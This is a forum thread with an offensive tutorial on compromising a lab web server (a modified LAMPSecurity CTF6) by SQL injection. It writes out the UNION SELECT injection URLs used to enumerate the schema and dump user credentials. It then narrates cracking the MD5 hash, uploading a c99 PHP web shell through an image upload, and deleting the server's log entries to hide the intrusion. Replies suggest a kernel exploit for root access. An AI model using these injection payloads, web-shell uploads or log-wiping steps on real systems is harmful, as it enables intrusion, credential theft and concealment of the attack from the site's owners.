Advanced SQL Injection Tutorial - Complete website rooting

[Abhi_M]

Hi All,

In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.

What all you need

1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

3. Any PHP Shell you are comfortable with
- Google for "c99 shell"

Now the process


Step 1:

I'm on the home page of the website now

Code:

http://192.168.132.128/

Step 2:

I went through all the pages of web site and found a page with URL input

Code:

http://192.168.132.128/?id=13

Step 3:

I launched Hackbar by pressing F9




Step 4:

The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.

Code:

http://192.168.132.128/?id=13'

Since the page content is different from the previous one. I can make sure that the web page is vulnerable.


Step 5:

Lets find out the number of tables

Code:

http://192.168.132.128/?id=13 order by 1

Step 6:

I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage

Code:

http://192.168.132.128/?id=13 order by 7

Step 7:

I went up to 7 and no change till now

Code:

http://192.168.132.128/?id=13 order by 7

Step 8:

I'm on 8 now and I can see the page changed

Code:

http://192.168.132.128/?id=13 order by 8

Step 9:

Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT





Step 10:

I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables





Step 11:

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7

Step 12:

I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7

The current user is cms_user@localhost



Step 13:

Lets find out the version of the database. I replaced 2 in the URL with version() command

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7

5.0.45 is the version



Step 14:

Let me list all the tables

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

From this list I found "user" is an interesting table



Step 15:

Now I listed all the columns and its a big list

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

Step 16:

I want columns from the table "user" and nothing else

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'

Step 17:

Lets find the user name

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user

Step 18:

Now, what about password

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

Its encrypted



Step 19:

Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com





Step 20:

Voila.!!! I got the password





Step 21:

Finding the log in page. Its was right in front of me




Step 22:

Logging in with the credentials I have




Step 23:

Greetings.!!!





Step 24:

I'm an admin now. Look at my powers.





Step 25:

Let me add an event





Step 26:

and of course I want to upload a picture





Step 27:

Lets see it allows me to upload the shell or not





Step 28:

Now I'm pressing on "Add Event" button





Step 29:

Nice. Looks like it's got uploaded





Step 30:

Let's see where the shell got uploaded to





Step 31:

I'm trying to get the default upload location







Step 32:

Looks like I got it



Let me click on the c9shell.php file I just uploaded



Step 33:

Voila. I have shell access





Step 34:

I simply clicked on the up button to get the root folder



Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial



Step 35:

What I'm interested is the log folder






Step 36:

I clicked on the log.log file and it has the logs of my noisy SQL injection attacks





Step 37:

Let me go back and edit the log file







Step 38:

I deleted complete log entries. Now saving it.





Step 39:

Nice. Log file is empty now





Step 40:

Now. Lets remove the c99 shell by pressing on Self Remove





Step 41:

Confirmed.!!!





Step 42:

OK. Good Bye C99





Step 43:

Well. It got deleted itself



Reference:

1. Infond tutorial

Happy Hacking.!!!

[x-c0d3]

Cool !!

[thedanielaaa95]

nice tutorial

[Un0wn_X]

Nice tutorial mate... But where is Rooting section? We can easily root that Centos server it has a 2.6.18-164 kernel...

[Abhi_M]

(02-18-2013 07:32 AM)Un0wn_X Wrote:  Nice tutorial mate... But where is Rooting section? We can easily root that Centos server it has a 2.6.18-164 kernel...

You got me there, I never finished the tutorial.
Then later on thought its just a matter of few searches on the Internet on how to do that and does not necessarily need Mantra. But that's not an excuse when the title says "rooting".

Will look into updating the post. Or better, you can write a short tutorial for all of us.

[asapol]

hi sir good day
what kind of toolbar is this?


it makes order by 1, order by 2 easy to type

[Abhi_M]

(05-10-2013 03:42 PM)asapol Wrote:  hi sir good day
what kind of toolbar is this?


it makes order by 1, order by 2 easy to type

It's one of my favorite extension, Hackbar -
http://secpedia.net/wiki/Hackbar
https://addons.mozilla.org/en-US/firefox/addon/hackbar/